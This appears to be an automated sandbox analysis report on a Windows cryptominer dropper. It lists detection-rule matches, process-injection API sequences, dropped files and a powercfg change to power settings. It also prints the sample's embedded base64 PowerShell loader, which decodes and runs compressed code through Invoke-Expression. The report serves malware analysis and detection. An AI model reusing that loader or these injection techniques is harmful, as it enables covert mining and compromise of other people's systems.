                      Source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe PID: 612, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: dialer.exe PID: 7780, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                      Uses powercfg.exe to modify the power settings
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\Windows\SysWOW64\system64x.exeCode function: 3_2_00007FF762441394 NtCloseObjectAuditAlarm,3_2_00007FF762441394
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,17_2_00000001400010C0
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589828C8 NtEnumerateValueKey,NtEnumerateValueKey,22_2_000001E8589828C8
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW,31_2_00000140AE86202C
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,31_2_00000140AE86253C
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA928C8 NtEnumerateValueKey,NtEnumerateValueKey,33_2_000001160CA928C8
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,44_2_00000001400010C0
                      Source: C:\Windows\System32\dialer.exeCode function: 45_2_0000000140001394 NtFlushVirtualMemory,45_2_0000000140001394
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6202C NtQuerySystemInformation,StrCmpNIW,53_2_0000028708E6202C
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,53_2_0000028708E6253C
                      Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\voeeoiqrjnla.sys
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile created: C:\Windows\SysWOW64\system64x.exeJump to behavior
                      Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                      Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_mkmwtu32.fhp.ps1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeCode function: 1_2_00007FF848AD09B21_2_00007FF848AD09B2
                      Source: C:\Windows\SysWOW64\system64x.exeCode function: 3_2_00007FF762443F703_2_00007FF762443F70
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_000000014000226C17_2_000000014000226C
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_00000001400014D817_2_00000001400014D8
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_000000014000256017_2_0000000140002560
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E858951F2C22_2_000001E858951F2C
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589638A822_2_000001E8589638A8
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85895D0E022_2_000001E85895D0E0
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E858982B2C22_2_000001E858982B2C
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589944A822_2_000001E8589944A8
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85898DCE022_2_000001E85898DCE0
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589B1F2C22_2_000001E8589B1F2C
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589C38A822_2_000001E8589C38A8
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589BD0E022_2_000001E8589BD0E0
                      Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 28_2_00007FF72AF23F7028_2_00007FF72AF23F70
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140ADFC1F2C31_2_00000140ADFC1F2C
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140ADFCD0E031_2_00000140ADFCD0E0
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140ADFD38A831_2_00000140ADFD38A8
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86DCE031_2_00000140AE86DCE0
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE8744A831_2_00000140AE8744A8
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE862B2C31_2_00000140AE862B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD59D0E032_2_00000195DD59D0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5A38A832_2_00000195DD5A38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD591F2C32_2_00000195DD591F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5CDCE032_2_00000195DD5CDCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5D44A832_2_00000195DD5D44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5C2B2C32_2_00000195DD5C2B2C
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA61F2C33_2_000001160CA61F2C
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA6D0E033_2_000001160CA6D0E0
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA738A833_2_000001160CA738A8
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA92B2C33_2_000001160CA92B2C
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA9DCE033_2_000001160CA9DCE0
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CAA44A833_2_000001160CAA44A8
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_000000014000226C44_2_000000014000226C
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_00000001400014D844_2_00000001400014D8
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_000000014000256044_2_0000000140002560
                      Source: C:\Windows\System32\dialer.exeCode function: 45_2_000000014000316045_2_0000000140003160
                      Source: C:\Windows\System32\dialer.exeCode function: 45_2_00000001400026E045_2_00000001400026E0
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10838A848_2_00000257E10838A8
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E107D0E048_2_00000257E107D0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E1071F2C48_2_00000257E1071F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10B44A848_2_00000257E10B44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10ADCE048_2_00000257E10ADCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10A2B2C48_2_00000257E10A2B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C1E38A849_2_000001F28C1E38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C1DD0E049_2_000001F28C1DD0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C1D1F2C49_2_000001F28C1D1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C9444A849_2_000001F28C9444A8
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C93DCE049_2_000001F28C93DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C932B2C49_2_000001F28C932B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA97FD1F2C50_2_000001CA97FD1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA97FDD0E050_2_000001CA97FDD0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA97FE38A850_2_000001CA97FE38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA98542B2C50_2_000001CA98542B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA9854DCE050_2_000001CA9854DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA985544A850_2_000001CA985544A8
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2652F38A851_2_000001D2652F38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2652ED0E051_2_000001D2652ED0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2652E1F2C51_2_000001D2652E1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2653244A851_2_000001D2653244A8
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D26531DCE051_2_000001D26531DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D26532AEC251_2_000001D26532AEC2
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D265312B2C51_2_000001D265312B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27D2B2C52_2_00000254A27D2B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27E44A852_2_00000254A27E44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27DDCE052_2_00000254A27DDCE0
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E31F2C53_2_0000028708E31F2C
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E3D0E053_2_0000028708E3D0E0
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E438A853_2_0000028708E438A8
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E62B2C53_2_0000028708E62B2C
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6DCE053_2_0000028708E6DCE0
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E744A853_2_0000028708E744A8
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DDDCE054_2_0000024B87DDDCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DE44A854_2_0000024B87DE44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DD2B2C54_2_0000024B87DD2B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FB3CD0E055_2_00000205FB3CD0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FB3D38A855_2_00000205FB3D38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FB3C1F2C55_2_00000205FB3C1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD402B2C55_2_00000205FD402B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD4144A855_2_00000205FD4144A8
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD40DCE055_2_00000205FD40DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056A2B2C56_2_000001A2056A2B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056ADCE056_2_000001A2056ADCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056B44A856_2_000001A2056B44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F3D0E057_2_0000018EC1F3D0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F438A857_2_0000018EC1F438A8
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F31F2C57_2_0000018EC1F31F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F6DCE057_2_0000018EC1F6DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F744A857_2_0000018EC1F744A8
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F62B2C57_2_0000018EC1F62B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3BCD0E058_2_0000025CE3BCD0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3BD38A858_2_0000025CE3BD38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3BC1F2C58_2_0000025CE3BC1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E0DCE058_2_0000025CE3E0DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E144A858_2_0000025CE3E144A8
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E02B2C58_2_0000025CE3E02B2C
                      Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\voeeoiqrjnla.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                      Source: C:\ProgramData\Google\Chrome\updater.exeCode function: String function: 00007FF72AF21394 appears 34 times
                      Source: C:\Windows\SysWOW64\system64x.exeCode function: String function: 00007FF762441394 appears 34 times
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000000.2235289313.00000000003EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename1Document.exe4 vs SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000026B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000002725000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe PID: 612, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: dialer.exe PID: 7780, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, MainApp.csBase64 encoded string: 'JHB3c2hjb2RlID0gJ0pBQkVBR1VBWXdCdkFHUUFaUUJrQUNBQVBRQWdBRnNBVXdCNUFITUFkQUJsQUcwQUxnQkRBRzhBYmdCMkFHVUFjZ0IwQUYwQU9nQTZBRVlBY2dCdkFHMEFRZ0JoQUhNQVpRQTJBRFFBVXdCMEFISUFhUUJ1QUdjQUtBQWlBRWdBTkFCekFFa0FRUUJCQUVFQVFRQkJBRUVBUVFCRkFFRUFTUUJYQUZFQVRRQlhBQzhBUXdCTkFFSUFRd0JHQUM4QU9BQnZBSEFBVVFCeEFFc0FWZ0J0QUd3QWFBQk9BRVFBUVFCTkFFa0FWZ0JTQUZnQVVRQnlBRmtBUXdCVkFFa0FVUUIwQUV3QVJRQndBRGdBVkFCU0FEUUFOUUJPQURjQVdRQnpBRTBBTHdBM0FEWUFSd0J2QUZjQWNRQnVBRlFBYmdCbUFGTUFaUUFyQUM4QU1BQXpBRmdBY3dCWUFFa0FkZ0F5QURnQWJnQkNBSGdBU3dCa0FFY0FhQUJoQUdnQVNBQlNBQzhBWWdCbUFGZ0Fhd0JzQUZRQVZ3QnVBRzBBYmdCd0FFa0FkQUJ4QUhRQWVnQkJBSEVBVmdCSEFIWUFSUUJFQUhFQVdRQlJBRVVBUVFCekFEVUFUd0I2QUc0QVZRQlFBSFlBWmdBMkFGVUFNZ0JOQUVNQUt3QldBRklBYXdCUUFEWUFkQUJ5QUZjQVJ3QnNBRW9BYkFCM0FIWUFid0JhQUZvQVlRQkxBRTRBZVFCM0FFb0FRUUJsQUcwQWR3QkdBR0lBWndCMkFFd0FiUUJEQUdNQVpnQnpBR2NBU2dCU0FGWUFNZ0JIQUhrQU1RQnBBRzhBYlFCSUFFd0FaQUIyQUZvQVdRQk1BRk1BZEFCNEFGVUFaUUE0QURnQWNBQlVBREFBVWdCQ0FHVUFMd0JaQUhFQWVBQlVBREVBUlFBNUFFNEFNUUIwQUhFQVVnQTFBR01BVndCeUFIa0FTUUIyQURrQVlnQnNBR1VBU1FCbkFFVUFUQUJ0QUVJQVdnQmpBRU1BVVFBMUFEUUFXQUE1QUhvQU1RQTRBRk1BVWdCYUFGRUFZd0IxQUVvQVJnQktBRFlBVUFCREFFOEFPUUExQUVvQWJBQlBBRVVBS3dCbkFIVUFlUUIzQUZJQU1RQnlBREFBTXdCMEFFZ0Fad0JDQUhBQVVRQXJBRk1BVGdCYUFHOEFNZ0EzQUVNQWVBQldBRzhBWWdBMUFFSUFPUUJMQUZNQVdBQjZBRThBT0FBMEFIQUFkUUJ5QUhjQU5BQmlBR01BYUFCTkFHNEFUQUEwQUM4QVRnQkxBRWNBVndCSEFFUUFVQUF3QUdZQWRRQTJBR3dBWndCMEFDc0FaZ0J0QUZBQVR3QXpBR3dBWlFCUkFEQUFiUUF4QUc4QWVnQlJBRElBTUFCekFGb0FRd0JKQUV3QU13QnFBQzhBTHdCVUFESUFWQUF2QUc4QVlnQnNBR0lBYXdBeUFFWUFNd0J6QUVJQVFRQkJBRUVBUFFBaUFDa0FPd0FrQUcwQWN3QWdBRDBBSUFBb0FFNEFaUUIzQUMwQVR3QmlBR29BWlFCakFIUUFJQUJUQUhrQWN3QjBBR1VBYlFBdUFFa0FUd0F1QUUwQVpRQnRBRzhBY2dCNUFGTUFkQUJ5QUdVQVlRQnRBQ2dBSkFCRUFHVUFZd0J2QUdRQVpRQmtBQ3dBTUFBc0FDUUFSQUJsQUdNQWJ3QmtBR1VBWkFBdUFFd0FaUUJ1QUdjQWRBQm9BQ2tBS1FBN0FHa0FaUUI0QUNnQVRnQmxBSGNBTFFCUEFHSUFhZ0JsQUdNQWRBQWdBRk1BZVFCekFIUUFaUUJ0QUM0QVNRQlBBQzRBVXdCMEFISUFaUUJoQUcwQVVnQmxBR0VBWkFCbEFISUFLQUJPQUdVQWR3QXRBRThBWWdCcUFHVUFZd0IwQUNBQVV3QjVBSE1BZEFCbEFHMEFMZ0JKQUU4QUxnQkRBRzhBYlFCd0FISUFaUUJ6QUhNQWFRQnZBRzRBTGdCSEFGb0FhUUJ3QUZNQWRBQnlBR1VBWVFCdEFDZ0FKQUJ0QUhNQUxBQWdBRnNBVXdCNUFITUFkQUJsQUcwQUxnQkpBRThBTGdCREFHOEFiUUJ3QUhJQVpRQnpBSE1BYVFCdkFHNEFMZ0JEQUc4QWJRQndBSElBWlFCekFITUFhUUJ2QUc0QVRRQnZBR1FBWlFCZEFEb0FPZ0JFQUdVQVl3QnZBRzBBY0FCeUFHVUFjd0J6QUNrQUtRQXBBQzRBY2dCbEFHRUFaQUIwQUc4QVpRQnVBR1FBS0FBcEFBPT0nDQokcHdzaGRlY29kZWQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlLkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCIkcHdzaGNvZGUiKSkNCkludm9rZS1FeHByZXNzaW9uICRwd3NoZGVjb2RlZA=='
                      Source: classification engineClassification label: mal100.adwa.spyw.evad.mine.winEXE@65/86@4/4
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,17_2_000000014000226C
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,44_2_000000014000226C
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,17_2_00000001400019C4
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,17_2_000000014000226C
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7388:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7604:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7560:120:WilError_03
                      Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\cwzyhcjpggltbmjx
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:576:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7660:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7632:120:WilError_03
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5hfiz3n.jvw.ps1Jump to behavior
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                      Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\ProgramData\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe"
